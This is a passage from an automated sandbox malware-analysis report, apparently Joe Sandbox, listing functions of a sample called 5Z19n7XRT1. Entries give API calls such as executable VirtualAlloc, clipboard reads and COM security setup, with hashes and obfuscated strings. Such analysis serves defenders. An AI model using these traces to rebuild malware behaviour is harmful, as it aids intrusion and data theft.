                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                          • Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                          • Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7
                                                                                                                                                                                                                                                                          Function 02490E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 633 2490e0f-2490e24 SetErrorMode * 2 634 2490e2b-2490e2c 633->634 635 2490e26 633->635 635->634
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                          Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                          • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
                                                                                                                                                                                                                                                                          Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                          • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                          • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
                                                                                                                                                                                                                                                                          Function 0040E648 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                                                                          • Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                                                                                                                                                                          • Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C
                                                                                                                                                                                                                                                                          Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                          • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                          • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                                          Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                          • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                          Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                          • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                          Function 008B943D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008B948E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008B8000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_8b8000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                          • Instruction ID: 08e2581c6666edb8aff2781b5caf790452b22b700f1266cea35c3c380732b211
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93113C79A00208EFDB01DF98C985E98BBF5EF08351F058094FA889B362D771EA50DF84

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 0043462A Relevance: 127.9, Strings: 102, Instructions: 417COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                                          • API String ID: 0-1394229784
                                                                                                                                                                                                                                                                          • Opcode ID: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
                                                                                                                                                                                                                                                                          • Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                                          Function 024C4891 Relevance: 127.9, Strings: 102, Instructions: 417COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                                          • API String ID: 0-1394229784
                                                                                                                                                                                                                                                                          • Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                                          • Instruction ID: 1f4a2e794e7d2c7584ff322526aa11d635a7b7172e91b8163015a43db2eee24c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E422452190C7E9CDEB26C638CC587DDBEA15B56314F1841DDC1996B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                                          Function 00434098 Relevance: 36.6, Strings: 29, Instructions: 348COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                                          • API String ID: 0-334816167
                                                                                                                                                                                                                                                                          • Opcode ID: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
                                                                                                                                                                                                                                                                          • Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
                                                                                                                                                                                                                                                                          Function 024C42FF Relevance: 36.6, Strings: 29, Instructions: 348COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                                          • API String ID: 0-334816167
                                                                                                                                                                                                                                                                          • Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                                          • Instruction ID: a370831407878d2bd8e699c9f93d2fc4d030550afc3f1f046d7385fa7cd4df03
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF1D321D087E98ADB32C67C8C543CDBFA15B53224F1943EDD4E9AB3D2C6790A46CB51
                                                                                                                                                                                                                                                                          Function 024C6447 Relevance: 28.6, APIs: 8, Strings: 8, Instructions: 636memorycomCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 024C6675
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(FA46F8B5), ref: 024C66D1
                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024C670E
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(w!s#), ref: 024C6762
                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(A3q5), ref: 024C6808
                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 024C687A
                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 024C69DC
                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 024C6A1A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                                          • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                          • API String ID: 2775254435-4124187736
                                                                                                                                                                                                                                                                          • Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                                          • Instruction ID: 4471d883d24829d293e7f5e4d13a140716708ae80f0bf33958f1c5f33134d227
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C012DDB66083409BD314CF29C881B6BBBEAFFC5304F25892DE695DB290D774D905CB86
                                                                                                                                                                                                                                                                          Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                          • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                          • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                          • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                          • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                                          Function 00409230 Relevance: 18.0, Strings: 14, Instructions: 458COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                                          • API String ID: 0-2345621967
                                                                                                                                                                                                                                                                          • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
                                                                                                                                                                                                                                                                          Function 02499497 Relevance: 18.0, Strings: 14, Instructions: 458COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                                          • API String ID: 0-2345621967
                                                                                                                                                                                                                                                                          • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction ID: cae17970a829ad014003fb070769b19a2d62e329bf1745f0b9743a69f9449325
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C1487154C3D58FD315CF2584A076BBFE1AFD2244F1889ADE4E11B782D739890ACBA2
                                                                                                                                                                                                                                                                          Function 0040F9FD Relevance: 17.1, Strings: 13, Instructions: 892COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
